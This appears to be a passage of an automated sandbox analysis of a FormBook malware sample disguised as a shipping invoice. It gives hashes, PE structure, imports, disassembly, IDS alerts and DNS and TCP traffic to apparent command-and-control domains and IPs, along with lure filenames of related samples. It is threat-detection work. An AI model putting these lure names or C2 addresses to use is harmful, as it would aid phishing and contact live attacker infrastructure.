	https://studyinblcu.net/	Get hash	malicious	Unknown	Browse	156.224.2.38
	Document 21824RXVPO.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	156.247.13.168
	https://13yxw.com/	Get hash	malicious	Unknown	Browse	156.224.2.38
	cvGqPFCsMn.exe	Get hash	malicious	Remcos	Browse	45.204.3.1
BODIS-NJUS	6 654398.vbs	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.227
	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAIL.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Invoice Packing list For Sea Shipment.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	zamowienie.exe	Get hash	malicious	GuLoader	Browse	199.59.243.227
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	199.59.243.227
	rHSBCBank_Paymentswiftcpy.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Re property pdf.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	#U8a02#U55ae#U63cf#U8ff0.vbs	Get hash	malicious	FormBook	Browse	199.59.243.227
	Document.html	Get hash	malicious	HTMLPhisher	Browse	199.59.243.227

Process:	C:\Users\user\Desktop\Invoice Packing list For Sea Shipment.exe
File Type:	SVr2 curses screen image, big-endian
Category:	dropped
Size (bytes):	189440
Entropy (8bit):	7.801356309679969
Encrypted:	false
SSDEEP:	3072:lv0T0rGKwrTrxcfAmfGUJYvGtXTDoMi4L3VRerpoFdEj1Stji+INxUoFP9uzU09H:igrGKWPaf9flWvGtJTbVRekcItj/IVF0
MD5:	AEEA00C8A641B455CAEA862DDF63206C
SHA1:	E00AB2AA82950A3200028903EF97B031622B5770
SHA-256:	BBB2CE40866BBD57AEF75DEFEEF9A5E3755087B384575C66A7A124D25F215342
SHA-512:	6949102F754B43F173DF2D4239AE9933853C1039F30BD8B1F7ED51F0FEF5638E481896B3ED8016EB0AC7B0CC7625AFF41C319ABF8EA8814480793428226A229E
Malicious:	false
Reputation:	low
Preview:	..wc.X3YE..;....e.UO...p[;...LA21XX3YEULA21XX3YEULA21XX3YEU.A21VG.WE.E...Y..x.=%2.A7T+$8l"S_67Gy'0l3G_x1]y...a_^<=.TH_hA21XX3Y.D..>...#..T..X......1....#.A...U..</).>.3YEULA21XX3YEULAbtXX.XDU..[`XX3YEULA.1ZY8XOUL.01XX3YEULAB.YX3IEUL.01XXsYEELA23XX6YDULA21]X2YEULA2.ZX3[EULA21ZXs.EU\A2!XX3YUULQ21XX3YUULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEUb5WI,X3Y..NA2!XX3.GULQ21XX3YEULA21XX.YE5LA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEULA21XX3YEU

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.337772534043839
TrID:	Win32 Executable (generic) a (10002005/4) 95.11% AutoIt3 compiled script executable (510682/80) 4.86% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Invoice Packing list For Sea Shipment.exe
File size:	1'092'191 bytes
MD5:	0bee5945faacacce5ae1481e51a3aa76
SHA1:	1569f1891a2594ba96b2e88b0a4cbe8ecef8deaf
SHA256:	b98984b8cdd94f3a64ab0bb0ac45983e62b311419f1a9735f398a71b4f85e98d
SHA512:	e4faef175d16e1d23e7ad254542d5d9c8d067aadbb19dc1224c7f1e4bb0c5a94652e28e30e8f73d7d04f2e490e2e590e430651baa010ff509d574a715b88e0cc
SSDEEP:	24576:ffmMv6Ckr7Mny5QLg/zydioLCeiU8Gg6uFiR1:f3v+7/5QLgYniU8AT
TLSH:	5135E112B3D680B6D9A339712D3BE32BEB3576194337C48BA7E02F768E111509B36761
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

File Icon


Icon Hash:	1733312925935517

Static PE Info

General

Entrypoint:	0x416310
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	aaaa8913c89c8aa4a5d93f06853894da

Entrypoint Preview

Instruction
call 00007F5388FD37ECh
jmp 00007F5388FC75BEh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F5388FC774Ah
cmp edi, eax
jc 00007F5388FC78EAh
cmp ecx, 00000100h
jc 00007F5388FC7761h
cmp dword ptr [004A94E0h], 00000000h
je 00007F5388FC7758h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F5388FC774Ah
pop esi
pop edi
pop ebp
jmp 00007F5388FC7BAAh
test edi, 00000003h
jne 00007F5388FC7757h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F5388FC776Ch
rep movsd
jmp dword ptr [00416494h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F5388FC774Eh
and eax, 03h
add ecx, eax
jmp dword ptr [004163A8h+eax*4]
jmp dword ptr [004164A4h+ecx*4]
nop
jmp dword ptr [00416428h+ecx*4]
nop
mov eax, E4004163h
arpl word ptr [ecx+00h], ax
or byte ptr [ecx+eax*2+00h], ah
and edx, ecx
mov al, byte ptr [esi]
mov byte ptr [edi], al
mov al, byte ptr [esi+01h]
mov byte ptr [edi+01h], al
mov al, byte ptr [esi+02h]
shr ecx, 02h
mov byte ptr [edi+02h], al
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007F5388FC770Eh

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[ASM] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8cd3c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab000	0x9298	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x82000	0x840	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x80017	0x80200	6c20c6bf686768b6f134f5bd508171bc	False	0.5602991615853659	data	6.634688230255595	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x82000	0xd95c	0xda00	f979966509a93083729d23cdfd2a6f2d	False	0.36256450688073394	data	4.880040824124099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x1a518	0x6800	e5d77411f751d28c6eee48a743606795	False	0.1600060096153846	data	2.2017649896261107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xab000	0x9298	0x9400	f6be76de0ef2c68f397158bf01bdef3e	False	0.4896801097972973	data	5.530303089784181	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab5c8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xab6f0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xab818	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xab940	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	Great Britain	0.48109756097560974
RT_ICON	0xabfa8	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	Great Britain	0.5672043010752689
RT_ICON	0xac290	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	Great Britain	0.6418918918918919
RT_ICON	0xac3b8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	Great Britain	0.7044243070362474
RT_ICON	0xad260	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	Great Britain	0.8077617328519856
RT_ICON	0xadb08	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	Great Britain	0.5903179190751445
RT_ICON	0xae070	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	Great Britain	0.5503112033195021
RT_ICON	0xb0618	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	Great Britain	0.6050656660412758
RT_ICON	0xb16c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	Great Britain	0.7553191489361702
RT_MENU	0xb1b28	0x50	data	English	Great Britain	0.9
RT_DIALOG	0xb1b78	0xfc	data	English	Great Britain	0.6507936507936508
RT_STRING	0xb1c78	0x530	data	English	Great Britain	0.33960843373493976
RT_STRING	0xb21a8	0x690	data	English	Great Britain	0.26964285714285713
RT_STRING	0xb2838	0x43a	data	English	Great Britain	0.3733826247689464
RT_STRING	0xb2c78	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xb3278	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xb38d8	0x388	data	English	Great Britain	0.377212389380531
RT_STRING	0xb3c60	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.502906976744186
RT_GROUP_ICON	0xb3db8	0x84	data	English	Great Britain	0.6439393939393939
RT_GROUP_ICON	0xb3e40	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xb3e58	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xb3e70	0x14	data	English	Great Britain	1.25
RT_VERSION	0xb3e88	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xb4028	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll	WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL	EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll	HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll	DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll	DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll	SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-23T15:00:26.911856+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49709	199.59.243.227	80	TCP
2024-10-23T15:00:26.911856+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49709	199.59.243.227	80	TCP
2024-10-23T15:00:26.911856+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49709	199.59.243.227	80	TCP
2024-10-23T15:00:49.296622+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49710	154.197.26.133	80	TCP
2024-10-23T15:00:49.296622+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49710	154.197.26.133	80	TCP
2024-10-23T15:00:49.296622+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49710	154.197.26.133	80	TCP
2024-10-23T15:02:30.884699+0200	2031412	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49711	89.184.73.149	80	TCP
2024-10-23T15:02:30.884699+0200	2031449	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49711	89.184.73.149	80	TCP
2024-10-23T15:02:30.884699+0200	2031453	ET MALWARE FormBook CnC Checkin (GET)	1	192.168.2.8	49711	89.184.73.149	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 23, 2024 15:00:26.387178898 CEST	49709	80	192.168.2.8	199.59.243.227
Oct 23, 2024 15:00:26.393440962 CEST	80	49709	199.59.243.227	192.168.2.8
Oct 23, 2024 15:00:26.393518925 CEST	49709	80	192.168.2.8	199.59.243.227
Oct 23, 2024 15:00:26.393623114 CEST	49709	80	192.168.2.8	199.59.243.227
Oct 23, 2024 15:00:26.399605036 CEST	80	49709	199.59.243.227	192.168.2.8
Oct 23, 2024 15:00:26.905654907 CEST	49709	80	192.168.2.8	199.59.243.227
Oct 23, 2024 15:00:26.911783934 CEST	80	49709	199.59.243.227	192.168.2.8
Oct 23, 2024 15:00:26.911855936 CEST	49709	80	192.168.2.8	199.59.243.227
Oct 23, 2024 15:00:48.639163017 CEST	49710	80	192.168.2.8	154.197.26.133
Oct 23, 2024 15:00:48.644567966 CEST	80	49710	154.197.26.133	192.168.2.8
Oct 23, 2024 15:00:48.644783974 CEST	49710	80	192.168.2.8	154.197.26.133
Oct 23, 2024 15:00:48.644840956 CEST	49710	80	192.168.2.8	154.197.26.133
Oct 23, 2024 15:00:48.650144100 CEST	80	49710	154.197.26.133	192.168.2.8
Oct 23, 2024 15:00:49.140189886 CEST	49710	80	192.168.2.8	154.197.26.133
Oct 23, 2024 15:00:49.187633991 CEST	80	49710	154.197.26.133	192.168.2.8
Oct 23, 2024 15:00:49.296349049 CEST	80	49710	154.197.26.133	192.168.2.8
Oct 23, 2024 15:00:49.296622038 CEST	49710	80	192.168.2.8	154.197.26.133

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 23, 2024 14:59:47.234788895 CEST	60033	53	192.168.2.8	1.1.1.1
Oct 23, 2024 14:59:47.259531021 CEST	53	60033	1.1.1.1	192.168.2.8
Oct 23, 2024 15:00:06.999752045 CEST	65419	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:00:07.091772079 CEST	53	65419	1.1.1.1	192.168.2.8
Oct 23, 2024 15:00:26.343641043 CEST	50634	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:00:26.386356115 CEST	53	50634	1.1.1.1	192.168.2.8
Oct 23, 2024 15:00:47.066956043 CEST	56500	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:00:48.077685118 CEST	56500	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:00:48.638511896 CEST	53	56500	1.1.1.1	192.168.2.8
Oct 23, 2024 15:00:48.638545036 CEST	53	56500	1.1.1.1	192.168.2.8
Oct 23, 2024 15:01:07.532649040 CEST	54062	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:01:07.545090914 CEST	53	54062	1.1.1.1	192.168.2.8
Oct 23, 2024 15:01:28.032007933 CEST	56969	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:01:28.043119907 CEST	53	56969	1.1.1.1	192.168.2.8
Oct 23, 2024 15:01:48.484659910 CEST	59620	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:01:48.495254993 CEST	53	59620	1.1.1.1	192.168.2.8
Oct 23, 2024 15:02:09.253479004 CEST	57627	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:02:09.388504982 CEST	53	57627	1.1.1.1	192.168.2.8
Oct 23, 2024 15:02:30.203258991 CEST	56366	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:02:30.261053085 CEST	53	56366	1.1.1.1	192.168.2.8
Oct 23, 2024 15:02:50.642935991 CEST	49929	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:02:50.665473938 CEST	53	49929	1.1.1.1	192.168.2.8
Oct 23, 2024 15:03:11.112498045 CEST	52788	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:03:11.123960972 CEST	53	52788	1.1.1.1	192.168.2.8
Oct 23, 2024 15:03:33.562748909 CEST	56828	53	192.168.2.8	1.1.1.1
Oct 23, 2024 15:03:33.574472904 CEST	53	56828	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 23, 2024 14:59:47.234788895 CEST	192.168.2.8	1.1.1.1	0x96e5	Standard query (0)	www.eader-aaexvn.xyz	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:00:06.999752045 CEST	192.168.2.8	1.1.1.1	0xfd26	Standard query (0)	www.ebaoge318.top	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:00:26.343641043 CEST	192.168.2.8	1.1.1.1	0xd1eb	Standard query (0)	www.9net88.net	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:00:47.066956043 CEST	192.168.2.8	1.1.1.1	0x4e0e	Standard query (0)	www.xhyx.top	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:00:48.077685118 CEST	192.168.2.8	1.1.1.1	0x4e0e	Standard query (0)	www.xhyx.top	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:01:07.532649040 CEST	192.168.2.8	1.1.1.1	0x93aa	Standard query (0)	www.rbuds.shop	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:01:28.032007933 CEST	192.168.2.8	1.1.1.1	0xd6af	Standard query (0)	www.acifictechnologycctv.net	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:01:48.484659910 CEST	192.168.2.8	1.1.1.1	0x2631	Standard query (0)	www.isit-txax.xyz	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:02:09.253479004 CEST	192.168.2.8	1.1.1.1	0x5338	Standard query (0)	www.ithin-ksvodn.xyz	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:02:30.203258991 CEST	192.168.2.8	1.1.1.1	0x9b22	Standard query (0)	www.rasko.net	A (IP address)	IN (0x0001)	false
Oct 23, 2024 15:02:50.642935991 CEST	192.168.2.8	1.1.1.1	0x7172	Standard query (0)	www.lsader.app	A (IP address)	IN (0x0001)	false
